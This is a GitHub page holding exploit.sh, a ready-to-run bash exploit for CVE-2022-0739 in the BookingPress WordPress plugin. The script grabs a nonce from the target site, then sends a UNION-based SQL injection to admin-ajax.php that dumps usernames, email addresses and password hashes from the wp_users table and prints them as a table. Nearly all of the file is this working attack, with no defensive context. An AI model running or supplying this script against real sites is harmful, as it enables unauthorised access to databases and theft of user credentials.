-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.sh
executable file
·112 lines (91 loc) · 2.79 KB
/
exploit.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
#!/bin/bash
display_help() {
cat << EOF
Usage: $0 [options]
Options:
-u, --url VALUE Set the URL (ex: http://example.com) (required)
-e, --event-dir VALUE Set the event directory (ex: events)
-h, --help Display this help message
EOF
}
get_nonce() {
nonce_url="$url/"
if [[ $dir != "" ]]; then
nonce_url="$url/$dir/"
fi
curl -s $nonce_url | grep "_wpnonce" | head -n 1 | cut -d "'" -f 4
}
print_line() {
printf "%s\n" "*$(printf '%0.s-' $(seq $(( login_length + 1 ))))*$(printf '%0.s-' $(seq $(( email_length + 1 ))))*$(printf '%0.s-' $(seq $(( pass_length + 1))))*"
}
print_data_line() {
printf "| %-*s| %-*s| %-*s|\n" $login_length "$1" $email_length "$2" $pass_length "$3"
}
print_datas() {
local login email pass
for (( i=1; i<=$list_login_nb; i++ ))
do
login=$(echo $list_login | awk '{print $'$i'}')
email=$(echo $list_email | awk '{print $'$i'}')
pass=$(echo $list_pass | awk '{print $'$i'}')
print_data_line $login $email $pass
done
}
get_length() {
max_length=15
for word in $@; do
length=${#word}
if [ $length -gt $max_length ]; then
max_length=$length
fi
done
echo $(( max_length + 5 ))
}
url=""
dir=""
nonce=""
while [[ $# -gt 0 ]]; do
case $1 in
-h|--help) display_help; exit 0;;
-u|--url) url="$2"; shift;;
-e|--event-dir) dir="$2"; shift ;;
*) echo "Exploit aborted: invalid option: $1" >&2; exit 1;;
esac
shift
done
if [[ -z $url ]]; then
echo "[-] URL is required" >&2; exit 1
fi
echo "CVE-2022-0739 - BookingPress < 1.0.11"
echo
echo "Options :"
echo " url : $url"
echo " dir : $dir"
echo
nonce=$(get_nonce)
if [[ -z $nonce ]]; then
echo "[-] Invalid URL/directory" >&2; exit 1
fi
echo "[-] Nonce : $nonce"
echo
data=$(curl -s -i "$url/wp-admin/admin-ajax.php" --data "action=bookingpress_front_get_category_services&_wpnonce=$nonce&category_id=1&total_service=1000) UNION ALL SELECT user_login,user_email,user_pass,NULL,NULL,NULL,NULL,NULL,NULL from wp_users-- -")
user_login="bookingpress_service_id"
user_email="bookingpress_category_id"
user_pass="bookingpress_service_name"
list_login=$(echo $data | grep -oP '"'$user_login'":"\K[^"]+' | sed 's/\\//g')
list_login_nb=$(echo $list_login | wc -w)
if ! [[ $list_login_nb -gt 1 ]]; then
echo "[-] Invalid URL" >&2; exit 1
fi
list_email=$(echo $data | grep -oP '"'$user_email'":"\K[^"]+' | sed 's/\\//g')
list_pass=$(echo $data | grep -oP '"'$user_pass'":"\K[^"]+' | sed 's/\\//g')
login_length=$(get_length $list_login)
email_length=$(get_length $list_email)
pass_length=$(get_length $list_pass)
echo "[-] $list_login_nb users found"
echo
print_line
print_data_line "user_login" "user_email" "user_pass"
print_line
print_datas
print_line